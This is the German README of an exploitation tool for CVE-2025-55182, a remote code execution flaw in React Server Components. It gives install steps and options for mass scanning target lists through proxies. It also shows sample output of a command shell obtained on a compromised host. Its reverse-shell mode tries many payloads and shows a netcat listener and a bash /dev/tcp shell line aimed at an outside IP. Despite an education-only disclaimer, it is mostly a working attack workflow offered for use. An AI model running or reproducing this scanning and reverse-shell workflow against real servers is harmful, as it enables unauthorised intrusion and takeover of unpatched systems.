
Kritischer RCE-Schwachstellenscanner für React Server Components (CVE-2025-55182). Automatisiertes Exploitation-Framework mit Multi-Payload-Unterstützung, Proxy-Fähigkeiten und interaktiver Befehlsausführung.
[!Warning] Dieses Repository ist ausschließlich für Bildungs- und Forschungszwecke bestimmt.
- Verwenden Sie die bereitgestellten PoCs ausschließlich auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben.
- Unautorisierter Zugriff, Ausnutzung oder Missbrauch jeglichen Materials in diesem Repository ist illegal.
- Die Autoren übernehmen keine Verantwortung für Schäden, Missbrauch oder rechtliche Konsequenzen, die aus unsachgemäßer Nutzung resultieren.
CVE-2025-55182 ist eine kritische Remote-Code-Ausführungsschwachstelle, die React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0 betrifft. Diese Schwachstelle beruht auf unsicherer Deserialisierung von HTTP-Anfrage-Payloads an Server-Funktionsendpunkte, wodurch nicht authentifizierte Angreifer beliebigen Code remote ausführen können.
CVE-ID: CVE-2025-55182
Betroffene Versionen:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| Argument | Beschreibung |
|---|---|
-d, --detection | Im Erkennungsmodus ausführen (nach Schwachstellen scannen) |
-e, --exploit | Im Exploit-Modus ausführen (ein einzelnes Ziel ausnutzen) |
-u, --url URL | Einzelne Ziel-URL zum Scannen/Ausnutzen |
-l, --list FILE | Datei mit Liste von Ziel-URLs (nur Erkennungsmodus) |
-p, --proxy URL | Einzelne Proxy-URL (z.B. http://127.0.0.1:8080) |
-pl, --proxy-list FILE | Datei mit Liste von Proxy-URLs (eine pro Zeile) |
-t, --threads N | Anzahl gleichzeitiger Threads (Standard: 10, nur Erkennungsmodus) |
-s, --silent | Stiller Modus - nur anfällige Ziele anzeigen (nur Erkennungsmodus) |
-o, --output [FILE] | Anfällige Ziele in Datei speichern (nur Erkennungsmodus). Wenn kein Dateiname angegeben, wird Standard verwendet: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | Debug-Logging aktivieren - zeigt Antwortdetails und Wiederholungsversuche (nicht im stillen Modus verfügbar) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
Wählen Sie dann [i] für die interaktive Shell:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
..
shell> exit
python3 main.py -e -u https://vulnerable-site.com
Wählen Sie dann [r] für die Reverse-Shell und wählen Sie den Payload-Typ:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
Das Tool probiert automatisch über 17 verschiedene Reverse-Shell-Payloads aus, bis einer erfolgreich ist.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1